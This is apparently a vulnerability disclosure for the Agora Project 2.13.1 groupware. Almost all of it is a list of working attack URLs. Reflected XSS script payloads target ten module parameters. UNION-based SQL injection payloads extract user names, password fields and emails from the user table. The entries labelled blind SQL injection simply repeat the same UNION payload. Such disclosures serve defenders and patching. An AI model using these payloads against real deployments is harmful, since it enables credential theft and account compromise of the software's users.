Agora Project 2.13.1 Multiple Vulnerabilities
Agora-Project is an intuitive groupware under GPL (Based on PHP/MySQL). It contains many modules: File Manager (with versioning), Calendars (with resource calendars), Task Manager, Bookmark manager, Contacts, News, Forum, Instant Messaging, etc. Vulnerabilities are XSS, SQLi, BSQLi. XSS exploits include 192.168.0.1/module_utilisateurs/utilisateur.php?id_utilisateur"><script>alert('xss')</script>, 192.168.0.1/module_agenda/evenement.php?id_evenement="<script>alert('xss')</script>, 192.168.0.1/module_contact/contact.php?id_contact="<script>alert('xss')</script>, 192.168.0.1/module_contact/index.php?id_dossier="<script>alert('xss')</script>, 192.168.0.1/module_tache/index.php?id_dossier="<script>alert('xss')</script>, 192.168.0.1/module_agenda/index.php?printmode="<script>alert('xss')</script>, 192.168.0.1/module_lien/index.php?id_dossier="<script>alert('xss')</script>, 192.168.0.1/module_forum/index.php?theme="<script>alert('xss')</script>, 192.168.0.1/module_fichier/index.php?id_dossier="<script>alert('xss')</script>, 192.168.0.1/module_tableau_bord/index.php?tdb_periode="<script>alert('xss')</script>. SQLi exploits include 192.168.0.1/module_forum/index.php?theme=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_forum/index.php?theme=1' aND 1=2 uNION sELECT nom,mdp FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_forum/index.php?theme=1' aND 1=2 uNION sELECT nom,mdp,email FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_forum/index.php?theme=1' aND 1=2 uNION sELECT nom,mdp,email,id_utilisateur FROM gt_utilisateur WHERE 1 AND '1'='1. BSQLi exploits include 192.168.0.1/module_utilisateurs/utilisateur.php?id_utilisateur=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_agenda/evenement.php?id_evenement=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_contact/contact.php?id_contact=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_contact/index.php?id_dossier=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_tache/index.php?id_dossier=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_agenda/index.php?printmode=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_lien/index.php?id_dossier=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_forum/index.php?theme=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_fichier/index.php?id_dossier=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_tableau_bord/index.php?tdb_periode=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1.